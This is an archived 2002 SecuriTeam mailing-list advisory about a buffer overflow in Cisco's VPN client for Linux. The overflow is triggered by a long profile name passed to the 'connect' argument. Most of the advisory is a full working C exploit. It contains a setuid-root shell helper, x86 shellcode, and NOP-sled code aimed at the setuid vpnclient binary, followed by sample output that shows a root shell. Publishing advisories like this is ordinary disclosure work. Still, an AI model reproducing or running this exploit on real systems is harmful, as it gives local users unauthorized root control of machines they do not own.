[EXPL] Cisco VPNclient Buffer Overflow
From: support@securiteam.comDate: 06/21/02
- Previous message: support@securiteam.com: "[NEWS] Weak Cisco PIX Enable Password Encryption Algorithm"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Fri, 21 Jun 2002 21:32:40 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Cisco VPNclient Buffer Overflow
------------------------------------------------------------------------
SUMMARY
Cisco VPN's client allows a user to connect to a Cisco VPN device using
the Linux operating system. A vulnerability in the product allows any
local user to gain root privileges via an exploitable buffer overflow in
the 'connect' argument. The overflow occurs whenever a long profile name
(520 bytes) is specified.
DETAILS
Exploit:
/* buffer overflow for cisco's vpnclient for Linux
tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz
to get this to properly work, you need to put the following code into
xx.c, compile it (as xx), and place the executable into /tmp (to bypass
tight PAM restrictions)
#include <stdio.h>
main() {
setuid(0);
execl("/bin/sh", "sh", NULL);
}
then compile this and run it. syntax is ./vpnclient <offset>
tested under gentoo linux and debian:
$ ls -la `which vpnclient`
-rws--x--x 1 root root 160900 Apr 13 22:34 /usr/local/bin/vpnclient
$ ./vpnKILLient
addr: 0xbffffbac, offset: 0
Cisco Systems VPN Client Version 3.5.1 (Rel)
Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved.
Client Type(s): Linux
Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686
sh-2.05a# id
uid=0(root) gid=100(users) groups=100(users),10(wheel)
greetz: all of the angrypacket crew (of course)
shok -> pheerable^2;
vegac -> 31336++;
when you get a chance, check out http://sec.angrypacket.com
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define NOP 0x90
#define LEN 620 /* 520 to own eip */
/* shellcode by vegac (setuid(0)->/tmp/xx) */
/* wont work if your /tmp partition is mounted noexec or nosuid */
char shell[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x78\x78"
"\x68\x2f\x74\x6d\x70\x89\xe3\x31"
"\xc0\x50\x89\xe2\x54\x89\xe1\xb0"
"\x0b\xcd\x80\x00";
unsigned long get_sp (void) {
__asm__("mov %esp,%eax");
}
int main(int argc, char *argv[]) {
int i, offset=0;
long addr;
char *buf, *ptr;
if(argc > 1) offset = atoi(argv[1]);
buf = (char *)malloc(sizeof(char) * LEN);
bzero(buf, LEN);
addr = get_sp() - offset;
printf("addr: 0x%x, offset: %d\n", addr, offset);
for(i = 0; i < LEN; i += 4) {
*(long *)&buf[i] = addr;
}
for(i = 0; i < (LEN / 2); i++) {
*(buf + i) = NOP;
}
ptr = buf + ((LEN / 2) - (strlen(shell) / 2));
for(i = 0; i < strlen(shell); i++) {
*(ptr++) = shell[i];
}
buf[LEN - 1] = '\0';
execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, 0);
return(0);
}
ADDITIONAL INFORMATION
The information has been provided by
<mailto:methodic@bigunz.angrypacket.com> methodic.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Weak Cisco PIX Enable Password Encryption Algorithm"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
